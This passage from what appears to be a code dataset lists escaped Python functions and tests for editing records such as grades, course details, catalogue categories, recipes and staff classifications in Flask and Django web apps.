new_target_age_min = flask.request.form.get(\"target_age_min\")\n new_target_age_min = int(\n new_target_age_min) if new_target_age_min else None\n new_target_age_max = flask.request.form.get(\"target_age_max\")\n new_target_age_max = int(\n new_target_age_max) if new_target_age_max else None\n if new_target_age_max is not None and 
new_target_age_min is not None and \\\n new_target_age_max < new_target_age_min:\n return INVALID_EDIT.detailed(_(\"Minimum target age must be less than maximum target age.\"))\n\n if work.target_age:\n old_target_age_min = work.target_age.lower\n old_target_age_max = work.target_age.upper\n else:\n old_target_age_min = None\n old_target_age_max = None\n if new_target_age_min != old_target_age_min or new_target_age_max != old_target_age_max:\n # Delete all previous staff target age classifications\n for c in old_classifications:\n if c.subject.type == Subject.AGE_RANGE:\n self._db.delete(c)\n\n # Create a new classification with a high weight - higher than audience\n if new_target_age_min and new_target_age_max:\n age_range_identifier = \"%s-%s\" % (\n new_target_age_min, new_target_age_max)\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.AGE_RANGE,\n subject_identifier=age_range_identifier,\n weight=WorkController.STAFF_WEIGHT * 100,\n )\n\n # Update fiction status\n # If fiction status hasn't changed but genres have changed,\n # we still want to ensure that there's a staff classification\n new_fiction = True if flask.request.form.get(\n \"fiction\") == \"fiction\" else False\n if new_fiction != work.fiction or genres_changed:\n # Delete previous staff fiction classifications\n for c in old_classifications:\n if c.subject.type == Subject.SIMPLIFIED_FICTION_STATUS:\n self._db.delete(c)\n\n # Create a new classification with a high weight (higher than genre)\n fiction_term = \"Fiction\" if new_fiction else \"Nonfiction\"\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_FICTION_STATUS,\n subject_identifier=fiction_term,\n weight=WorkController.STAFF_WEIGHT,\n )\n classification.subject.fiction = new_fiction\n\n # Update genres\n # make sure all new genres are legit\n for name in new_genres:\n genre, is_new = Genre.lookup(self._db, name)\n if not isinstance(genre, Genre):\n return GENRE_NOT_FOUND\n if genres[name].is_fiction is not None and genres[name].is_fiction != new_fiction:\n return INCOMPATIBLE_GENRE\n if name == \"Erotica\" and new_audience != \"Adults Only\":\n return EROTICA_FOR_ADULTS_ONLY\n\n if genres_changed:\n # delete existing staff classifications for genres that aren't being kept\n for c in old_genre_classifications:\n if c.subject.genre.name not in new_genres:\n self._db.delete(c)\n\n # add new staff classifications for new genres\n for genre in new_genres:\n if genre not in old_staff_genres:\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=genre,\n weight=WorkController.STAFF_WEIGHT\n )\n\n # add NONE genre classification if we aren't keeping any genres\n if len(new_genres) == 0:\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=SimplifiedGenreClassifier.NONE,\n weight=WorkController.STAFF_WEIGHT\n )\n else:\n # otherwise delete existing NONE genre classification\n none_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Subject.identifier == SimplifiedGenreClassifier.NONE\n ) \\\n .all()\n for c in none_classifications:\n self._db.delete(c)\n\n # Update presentation\n policy = PresentationCalculationPolicy(\n classify=True,\n regenerate_opds_entries=True,\n regenerate_marc_record=True,\n update_search_index=True\n 
)\n work.calculate_presentation(policy=policy)\n\n return Response(\"\", 200)", "def test_superuser_edit_assessment(self):\n req, resp = data.get_assessment(self.contract['id'])\n\n response = self.superuser.put(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_update_category(self):\n self.update_success(self.test_data['pants'], self.test_data['shirts'])", "def detail_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n assignments = assignmentype.assignment_set.\\\n annotate(std=StdDev('evalassignment__grade_assignment'),\n mean=Avg('evalassignment__grade_assignment'))\n if assignmentype:\n context['assignmentype'] = assignmentype\n context['assignments'] = assignments\n context['range_grades'] = range(assignmentype.nb_grading)\n return render(request, 'gradapp/detail_assignmentype.html',\n context)\n else:\n return redirect('gradapp:list_assignmentypes_running')", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def update_course_index(self, updated_index_entry):\r\n self.db_connection.update_course_index(updated_index_entry)", "def update_experience(uid, rid, increment):\n errmsg = []\n\n experience = Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).first()\n if not experience:\n errmsg.append(\"Experience entry does not exist for the given user ID and restaurant ID.\")\n elif increment < 0:\n errmsg.append(\"Experience cannot be incremented by a negative number.\")\n\n if not errmsg:\n old_level = convert_experience_to_level(experience.experience)\n milestone = get_milestone(uid, rid)\n Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).update(dict(experience=experience.experience + increment))\n db.session.commit()\n if milestone:\n new_level = convert_experience_to_level(experience.experience)\n if old_level < new_level and new_level == int(milestone[\"level\"]):\n update_points(uid, rid, milestone[\"reward\"])\n return None\n\n return errmsg", "def coeff_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n if assignmentype:\n nb_questions = assignmentype.nb_questions\n if request.method == 'POST':\n form = CoeffForm(request.POST,\n nb_questions=nb_questions)\n if form.is_valid():\n assignmentype.questions_coeff = [form.cleaned_data['coeff_%s'\n % i] for i\n in range(1, assignmentype.\n nb_questions + 1)]\n assignmentype.save()\n # Compute all grades\n log = tasks.compute_grades_assignmentype(assignmentype.id)\n logger.error(log)\n return redirect('/detail_assignmentype/%s/' % pk)\n else:\n questions_coeff = assignmentype.questions_coeff\n coeff = {}\n if questions_coeff:\n for i in range(1, nb_questions + 1):\n coeff['coeff_%s' % i] = assignmentype.questions_coeff[i - 1]\n else:\n coeff = dict.fromkeys(['coeff_%s' % i\n for i in range(1, nb_questions + 1)],\n None)\n form = CoeffForm(nb_questions=nb_questions,\n initial=coeff)\n context['form'] = form\n context['assignmentype'] = assignmentype\n return render(request, 'gradapp/coeff_assignmentype.html',\n context)\n return redirect('gradapp:list_assignmentypes_running')", "def 
update_course_info(self, grades_file_info):\n grades_file = os.path.join(self.path, \"grades.txt\")\n sep, header = grades_file_info\n try:\n for info in file_reading_gen(grades_file, 4, sep, header):\n # StudentID | Course | Grade | InstructorID\n student_id = info[0]\n course_code = info[1]\n grade = info[2]\n instructor_id = info[3]\n\n if student_id not in self.students:\n raise KeyError(\"Student with student id {} does not exist in students.txt\".format(student_id))\n if instructor_id not in self.instructors:\n raise KeyError(\"Instructor with instructor id {} does not exist in instructors.txt\".format(instructor_id))\n\n student = self.students[student_id]\n instructor = self.instructors[instructor_id]\n\n student.courses_completed.add(course_code)\n student.grades[course_code] = grade\n\n instructor.courses_taught.add(course_code)\n instructor.student_count[course_code] += 1\n except ValueError:\n raise ValueError(\"Invalid data in grades.txt\")\n except FileNotFoundError as e:\n print('Missing grades.txt.\\n' + str(e))", "def editProfile():\n form = EditProfileForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/editprofile.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editProfileSection\", section=section))", "def edit(self):\n\n pass", "def edit_recipe(request, **kwargs):\n template = 'recipe/add-edit-vary.html'\n pk = kwargs.get('pk')\n recipe = Recipe.objects.get(pk=pk)\n if request.method == 'POST':\n recipe_form = RecipeForm(request.POST, request.FILES, instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(request.POST,\n prefix='ingredient_form')\n if formset.is_valid() and recipe_form.is_valid():\n recipe_form.save()\n for ingredient in formset.cleaned_data:\n if ingredient:\n if ingredient['id']:\n relationship = RecipeIngredientRelationship.objects.get(id=ingredient['id'].id)\n relationship.quantity = ingredient['quantity']\n relationship.ingredient = ingredient['ingredient']\n relationship.save()\n else:\n new = RecipeIngredientRelationship(recipe=recipe,\n quantity=ingredient['quantity'],\n ingredient=ingredient['ingredient'])\n new.save()\n return HttpResponseRedirect('/')\n else:\n recipe_form = RecipeForm(instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(queryset=recipe.ingredients_in_recipe.all(), prefix='ingredient_form')\n return render(request, template, {'formset': formset,\n 'recipe_form': recipe_form,\n 'page_title': 'Edit Recipe'})", "def save_course(self):\r\n self.course.save()\r\n self.store.update_item(self.course, self.user.id)", "def edit_entry():\n if not check_admin_logged() :\n abort(403)\n\n title = request.form['title']\n category = request.form['category']\n buydate = request.form['buydate']\n ssid = decrypt_book_record(request.form['ssid'])\n\n if not check_items_in_form(title, category, buydate):\n return redirect(url_for('show_entries_admin'))\n\n edited_entry = Entries.query.filter_by(\n id=ssid, title=title, category=category, \\\n buydate=buydate).first()\n\n if edited_entry is not None :\n edited_entry.introduction = request.form['introduction']\n if db.session.is_modified(edited_entry) :\n # commit only if something is modified\n try :\n db.session.commit()\n except IntegrityError as e :\n log_error('error when edit:')\n log_error(e.message)\n flash(u'Database operation failed, so the update failed! Please check the backend log')\n return redirect(url_for('show_entries_admin'))\n flash(u'Entry updated successfully')\n\n return redirect(url_for('show_entries_admin'))", "def careerCatagory_edit(request):\r\n action = 
tool.get_param_by_request(request.GET, 'action', \"add\", str)\r\n page_index = tool.get_param_by_request(request.GET, 'page_index', 1, int)\r\n\r\n careerCatagory = None\r\n if action == \"edit\" or action == \"show\":\r\n _id = tool.get_param_by_request(request.GET, 'id', 0, int)\r\n careerCatagory = api_careerCatagory.get_career_catagory_by_id(_id)\r\n\r\n if careerCatagory.is_error():\r\n return render_to_response(\"404.html\", {}, context_instance=RequestContext(request))\r\n\r\n careerCatagory = careerCatagory.result()[0]\r\n\r\n c = {\"careerCatagory\": careerCatagory, \"action\": action, \"page_index\": page_index}\r\n\r\n return render_to_response(\"mz_course/careerCatagory_save.html\", c, context_instance=RequestContext(request))", "def updateStudentProjectReferences(request):\n\n return updateReferencesForModel('student_project')", "def edit_student(request, s_id):\n user = CustomUser.objects.get(id=s_id)\n student = Student.objects.get(user_id=s_id)\n\n if request.method == 'POST':\n user_edit_form = EditUserForm(request.POST, instance=user)\n student_edit_form = EditStudentForm(request.POST, instance=student)\n\n if user_edit_form.is_valid() and student_edit_form.is_valid():\n user_edit_form.save()\n student_edit_form.save()\n messages.success(request, \"The student's account has been edited successfully\")\n return redirect('student_account', s_id=s_id)\n else:\n messages.error(request, \"The form has not been filled correctly\")\n\n else:\n user_edit_form = EditUserForm(instance=user)\n student_edit_form = EditStudentForm(instance=student)\n\n context = {\n 'user_edit_form': user_edit_form,\n 'student_edit_form': student_edit_form\n }\n return render(request, 'main/edit_student.html', {'user_edit_form': context['user_edit_form'],\n 'student_edit_form': context['student_edit_form']})", "def put(self, request, pk, format=None):\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> requset:{}, pk: {}\".format(\n request.query_params, pk))\n\n try:\n program_id = request.META.get('HTTP_X_SVMS_PROGRAM_ID')\n if not program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Program Id not found\"))\n return Response(\n {\"error\": \"Program Id not found\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n if 'category' in request.data and 'job_title' in request.data[\n 'category']:\n job_title_data = request.data['category']['job_title']\n for data in job_title_data:\n job_title_data_list = {}\n for each_data in data:\n if each_data in EDITABLE_FIELDS:\n job_title_data_list.update(\n {each_data: data[each_data]}\n )\n job_title_obj = JobTitleDetailView.get_object(\n self, data['id'])\n\n if job_title_obj.program_id != program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Not authorized to edit\"))\n return Response(\n {\"error\": \"Not authorized to edit\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n serializer = JobTitleSerializer(\n instance=job_title_obj, data=job_title_data_list,\n partial=True)\n if serializer.is_valid():\n serializer.save()\n else:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk,\n \"Only Job Level, Description and Job Tag is editable\"))\n return Response(\n {\n \"error\": \"Only Job Level, Description and Job Tag is editable\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n catalog_obj = self.get_object(pk)\n serializer = JobCatalogSerializer(catalog_obj)\n settings.LOGGER.info(\n 
\"JobCatalogDetailViewList >> PUT >> pk: {}, Response:{} \".format(\n pk, serializer.data))\n\n return Response(\n serializer.data,\n status=status.HTTP_200_OK\n )\n except Exception as e:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, e))\n return Response({\"error\": \"{}\".format(e)},\n status=status.HTTP_400_BAD_REQUEST)", "def editItem(category_item_id):\n editedItem = db.findItem(id=category_item_id)\n if editedItem.user_id != login_session['user_id']:\n return not_authorized()\n if request.method == 'POST':\n db.updateItem(editedItem, request.form)\n return redirect(url_for('showCatalog'))\n return render_template(\n 'edit_item.html', categories=db.getAllCategories(), item=editedItem)", "def update_category(data, key):\n try:\n category = Categories.objects.get(pk=key, is_delete=False)\n except ObjectDoesNotExist:\n return Response({'status': CATEGORY_NOT_FOUND}, status=status.HTTP_404_NOT_FOUND)\n\n valid_fields = ['period_number', 'period_name', 'terms']\n correct_details = True\n for field in data:\n if field in valid_fields:\n setattr(category, field, data[field])\n else:\n correct_details = False\n break\n\n if correct_details:\n category.save()\n return Response({'status': CATEGORY_UPDATED}, status=status.HTTP_200_OK)\n return Response({'status': INVALID_FIELDS}, status=status.HTTP_400_BAD_REQUEST)", "def item_update(request):\n if request.method == 'POST':\n item_to_update = get_object_or_404(StockItem, pk=request.POST['id'])\n item_to_update.name = request.POST['name']\n item_to_update.count = int(request.POST['count'])\n item_to_update.date_of_expiration = request.POST['exp']\n item_to_update.fk_category = Category.objects.get(name=request.POST['cat'])\n item_to_update.fk_subcategory = SubCategory.objects.get(name=request.POST['subcat'])\n item_to_update.notes = request.POST['notes']\n item_to_update.save()\n return HttpResponse(status=200)", "def this_is_the_grade(self, grade_to_set):\n\n\t\tcmds.intField(self.grade_intField, edit = True, value = grade_to_set['grade_value'])\n\t\tself.update_subcategory('intField')\n\t\tif grade_to_set['grade_value'] is not '':\n\t\t\tcmds.scrollField(self.comments_text_field, edit = True, text = grade_to_set['comment_text'])\n\t\t\tself.update_subcategory('comments_text')\n\t\tif grade_to_set['default_comments_text'] is not '':\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = grade_to_set['default_comments_text'])\n\t\t\tself.update_subcategory('default_comments_text')\n\t\tif grade_to_set['example_comments_text'] is not '':\n\t\t\tcmds.scrollField(self.example_comments, edit = True, text = grade_to_set['example_comments_text'])\n\t\t\tself.update_subcategory('example_comments_text')\n\n\t\tself.auto_flagged_list = grade_to_set.get('examples', [])\n\t\tself.log('auto_flagged_list updated: \\n{}'.format(self.auto_flagged_list))", "def __ui_update_student(self):\n student_id = input(\"student id: \")\n student_name = input(\"student discipline_name: \")\n disciplines_list = []\n\n discipline_name = None\n while discipline_name != '':\n discipline_name = input(\"Discipline discipline_name: \")\n if discipline_name == '':\n break\n elif self.__discipline_controller.find_by_name(discipline_name) is not None:\n disciplines_list.append(discipline_name)\n print(\"Add discipline successful\\n\")\n else:\n print(\"Invalid discipline!\")\n\n try:\n self.__student_controller.update_student(student_id, student_name, disciplines_list)\n print(\"Update student successful\\n\")\n 
except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def update_shift(self, shift_id, pro, mid, beginner):\n try:\n self.db_handler.update_shift_by_id(shift_id, pro, mid, beginner)\n self.logger.write_to_log('shift updated', 'model')\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def test_update_entry_courses(self):\r\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\r\n pass", "def give_extra_credit(grades,netids,bonus):\n # No accumulator. This is a procedure\n \n for student in netids:\n if student in grades: # Test if student is a key in grades\n grades[student] = grades[student]+bonus", "def put(self, request, pk):\n return self.update(request, pk)", "def update_decision(request, sub_id):\n submission = get_object_or_404(Submission, id=sub_id)\n validate_chair_access(request.user, submission.conference)\n stage, _ = ReviewStage.objects.get_or_create(\n submission=submission,\n num_reviews_required=(\n submission.stype.num_reviews if submission.stype else 0),\n locked=False)\n decision = stage.decision\n form = UpdateReviewDecisionForm(request.POST, instance=decision)\n if form.is_valid():\n form.save()\n return JsonResponse(status=200, data={})\n return JsonResponse(status=500, data={'errors': form.errors})", "def _add_grade_to_row(self, component, score):\r\n component_index = self.components.setdefault(component, len(self.components))\r\n self._current_row[component_index] = score", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = self.request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'update-course-category', {'key': key}):\n return\n\n if not roles.Roles.is_super_admin():\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': self.KEY})\n return\n\n payload = request.get('payload')\n updated_dict = transforms.json_to_dict(\n transforms.loads(payload), self.get_schema_dict())\n\n errors = []\n self.apply_updates(updated_dict, errors)\n if not errors:\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n course = get_course_with_access(\r\n request.user, 'instructor', course_id, depth=None\r\n )\r\n try:\r\n user = get_student_from_identifier(request.GET.get('unique_student_identifier'))\r\n except User.DoesNotExist:\r\n response_payload = {\r\n 'unique_student_identifier': request.GET.get('unique_student_identifier'),\r\n 'userDoesNotExist': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n # Check that user is active, because add_users\r\n # in common/djangoapps/student/roles.py fails\r\n # silently when we try to add an inactive user.\r\n if not user.is_active:\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'inactiveUser': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n rolename = request.GET.get('rolename')\r\n action = request.GET.get('action')\r\n\r\n if not rolename in ['instructor', 'staff', 'beta']:\r\n return 
HttpResponseBadRequest(strip_tags(\r\n \"unknown rolename '{}'\".format(rolename)\r\n ))\r\n\r\n # disallow instructors from removing their own instructor access.\r\n if rolename == 'instructor' and user == request.user and action != 'allow':\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'removingSelfAsInstructor': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n if action == 'allow':\r\n allow_access(course, user, rolename)\r\n elif action == 'revoke':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"unrecognized action '{}'\".format(action)\r\n ))\r\n\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'success': 'yes',\r\n }\r\n return JsonResponse(response_payload)", "def insert_grade(grade, form, rc):\n dbname = form[\"dbname\"]\n collname = \"grades\"\n try:\n coll = rc.client[dbname][collname]\n except (KeyError, AttributeError):\n abort(404)\n try:\n added = rc.client.insert_one(dbname, collname, grade)\n except Exception:\n traceback.print_exc()\n raise", "def update(self, request, *args, **kwargs):\n response = super(CategoryViewSet, self).update(request, *args, **kwargs)\n response.data['message'] = \"Category has been edited\"\n return response", "def update_search_parameters(self, selected_gender, selected_category, selected_subcategory):\r\n self.model.set_gender(selected_gender)\r\n self.model.set_category(selected_category)\r\n self.model.set_subcategory(selected_subcategory)\r\n self.model.fetch_results()", "def update_enrollment(context: dict) -> dict:\n enrollment = (\n session.query(Enrollment)\n .filter_by(\n subject_code=context[\"subject_code\"],\n student_ra=context[\"student_ra\"],\n year=context[\"year\"],\n semester=context[\"semester\"],\n )\n .first()\n )\n\n if enrollment:\n for attr in context.keys():\n setattr(enrollment, attr, context[attr])\n\n enrollment.save()\n\n return enrollment.asdict()", "def change_votes(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk, new_votes = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n this_problem = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(this_problem.value)\r\n # problem_dict[answer][pk] points to a [hint_text, #votes] pair.\r\n problem_dict[answer][pk][1] = int(new_votes)\r\n this_problem.value = json.dumps(problem_dict)\r\n this_problem.save()", "def take_test(exam, student):\n\n student.score = exam.administer()", "def edit_category(category):\n # Verify user login. 
If not, redirect to login page.\n login_status = None\n if 'email' in login_session:\n login_status = True\n else:\n flash('Please log in.')\n return redirect(url_for('home'))\n if request.method == 'POST':\n # Query database with SQLAlchemy and store query as an object\n category = (session.query(Categories)\n .filter_by(name=category.replace('-', ' '))\n .one())\n # Get form fields\n edit_category_name = request.form['edit_category_name']\n # Get user's database ID\n user_db_id = (session.query(Users)\n .filter_by(email=login_session['email'])\n .one()).id\n # Get database ID of category creator\n creator_db_id = category.creator_db_id\n print(\"Current user's database primary key id is {}.\"\n .format(user_db_id))\n print(\"Category creator's database primary key id is {}.\"\n .format(creator_db_id))\n print('Category to edit is \"{}\".'.format(category.name))\n # Only allow creator to edit. If not, redirect to login.\n if user_db_id != creator_db_id:\n flash('Only the creator can edit. Please log in as creator.')\n return redirect(url_for('home'))\n # Flash messages for incomplete item info\n if not request.form['edit_category_name']:\n flash('Please identify category.')\n return redirect(url_for('edit_category'))\n # Overwrite object with new info for database\n category.name = edit_category_name\n print('Category name for database is \"{}\".'.format(category.name))\n session.add(category)\n session.commit()\n # Return to homepage\n return redirect(url_for('home'))\n else:\n # Render webpage\n return render_template('edit_category.html',\n category_name=category,\n login_status=login_status)", "def edit(self, *args, **kw):\n\t\t\ttmpl_context.widget = self.edit_form\n\t\t\tpks \t\t= self.provider.get_primary_fields(self.model)\n\t\t\tkw \t\t\t= {}\n\n\t\t\tfor i, pk in enumerate(pks):\n\t\t\t\tkw[pk] \t\t= args[i]\n\n\t\t\tvalue \t\t= self.edit_filler.get_value(kw)\n\t\t\tvalue['_method'] \t= 'PUT'\n\n\t\t\treturn dict(value = value, model = self.model.__name__, pk_count = len(pks))", "def test_update_category(self):\n pass", "def update(request):\n\tcourse_id = request.GET.get('course_id')\n\tif request.method == 'POST':\n\t\tcourse_title = request.POST['course_title']\n\t\tinstitute_name = request.POST['institute_name']\n\t\tcourse_desc = request.POST['course_desc']\n\t\tcurrent_data = Course.objects.get(course_id = course_id)\n\t\tcurrent_data.course_title = course_title\n\t\tcurrent_data.institute_name = institute_name\n\t\tcurrent_data.course_desc = course_desc\n\t\tcurrent_data.save()\n\t\treturn HttpResponseRedirect(reverse('courseapp:index'))\n\tdata = Course.objects.get(course_id = course_id)\n\treturn render(request,'update.html',{'data':data})", "def test_superuser_edit_assessment(self):\n req, resp = data.assessment_02_request, data.assessment_02_response\n resp['contract'] = self.contract['id']\n\n response = self.superuser.put(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_custom_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def modificarcategoria(self, categoria):\n self.categoria=categoria", "def edit_change_plan_actio(\r\n self, original_step: int, change_plan_action: ChangePlanAction\r\n ) -> None:\r\n try:\r\n conditions = []\r\n conditions.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions.append(ChangePlanActionEntry.step == original_step)\r\n 
conditions.append(ChangePlanActionEntry.action != Constants.COLLATERAL_KEY)\r\n\r\n old_entry: ChangePlanActionEntry = ChangePlanActionEntry.query.filter(\r\n and_(*conditions)\r\n ).first()\r\n\r\n # Deleting old colateral conditions\r\n conditions_colat = []\r\n conditions_colat.append(\r\n ChangePlanActionEntry.change_plan_id\r\n == change_plan_action.change_plan_id\r\n )\r\n conditions_colat.append(ChangePlanActionEntry.step == original_step)\r\n conditions_colat.append(\r\n ChangePlanActionEntry.action == Constants.COLLATERAL_KEY\r\n )\r\n\r\n ChangePlanActionEntry.query.filter(and_(*conditions_colat)).delete()\r\n\r\n # Edit sequence of actions if order changes\r\n if original_step != change_plan_action.step:\r\n self._edit_change_plan_sequence(\r\n change_plan_action.change_plan_id,\r\n original_step,\r\n change_plan_action.step,\r\n )\r\n\r\n old_entry.step = change_plan_action.step\r\n old_entry.action = change_plan_action.action\r\n old_entry.original_asset_number = change_plan_action.original_asset_number\r\n old_entry.new_record = change_plan_action.new_record\r\n\r\n db.session.commit()\r\n except:\r\n print(\r\n f\"Failed to update change plan action on asset {change_plan_action.original_asset_number}\"\r\n )", "def test_update_preferences_by_category(self):\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def editCategory(category_id):\n\n if 'username' not in login_session:\n return redirect('/login')\n\n editedCategory = session.query(Category).filter_by(id=category_id).one()\n if editedCategory.user_id != login_session['user_id']:\n flash('You are not the creator of %s category, and cannot modify it' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n if request.method == 'POST':\n if \"btn_edit\" in request.form:\n if request.form['name']:\n editedCategory.name = request.form['name']\n flash('Category Successfully Edited %s' %\n editedCategory.name)\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return redirect(url_for('showCategories'))\n else:\n return render_template('editCategory.html',\n category=editedCategory,\n user=getUserInfo(login_session['user_id']))", "def assignment_grade(id, session_id, course_id):\n\n user_id = session.get('user_id')\n\n con = db.get_db()\n cur = con.cursor()\n cur.execute(\"\"\"SELECT DISTINCT(ROUND(grades.points_received / grades.total_points, 2) * 100) as assignment_grade,\n grades.total_points as total, grades.points_received as earned,\n grades.submission as submission, grades.feedback as feedback,\n grades.student_id, grades.assignment_id as assign_id, assignments.name as assign_name,\n assignments.description as description,\n grades.grade_id, roster.session_id as class_session, courses.name as name\n\t FROM courses JOIN sessions on courses.course_id=sessions.id\n\t JOIN assignments on assignments.session_id=sessions.id\n JOIN grades on grades.assignment_id=assignments.assignment_id\n JOIN roster on roster.session_id=sessions.id\n WHERE grades.assignment_id= %s\n AND grades.student_id= %s\"\"\",\n (id, user_id))\n\n grade = cur.fetchone()\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/assignment_grade.html\", course_id=course_id, session_id=session_id, id=id, grade=grade)", "def edit():", "def test_update_category(self):\n category = sample_category()\n url = category_details_url(category.id)\n self.client.put(url, {\"name\": 
\"school\"})\n category.refresh_from_db()\n self.assertEqual(category.name, 'school')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def updateEMPStudy(self, study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, \n portal_type, study_title, study_alias, pmid, study_abstract, study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries):\n con = self.getMetadataDatabaseConnection()\n results = con.cursor().callproc('qiime_assets.emp_study_update', \n [study_id, study_name, investigation_type, miens_compliant, submit_to_insdc, portal_type, \n study_title, study_alias, pmid, study_abstract, study_description,\n number_samples_collected, number_samples_promised , lab_person,\n lab_person_contact, emp_person, first_contact, most_recent_contact, sample_type, \n has_physical_specimen, has_extracted_data, timeseries, spatial_series,\n principal_investigator, principal_investigator_contact, default_emp_status, funding,\n includes_timeseries])", "def _editClickedSlot(self):\r\n\r\n index = self.propertiesTableView.selectionModel().currentIndex()\r\n if index.isValid():\r\n self.propertiesTableView.edit(index)", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def put(self, request, pk):\n data = request.data\n data.pop('skills')\n Department_name = data.pop('department')\n department = Department.objects.get(name=Department_name)\n manager_name = data.pop('manager')\n manager = Manager.objects.get(name=manager_name)\n EmployeeDetail.objects.filter(pk=pk).update(department=department, manager=manager, **data)\n return Response(\n data=\"request.data\"\n )", "def update_category_item(catalog_item_id):\n edited_item = session.query(CatalogItem). 
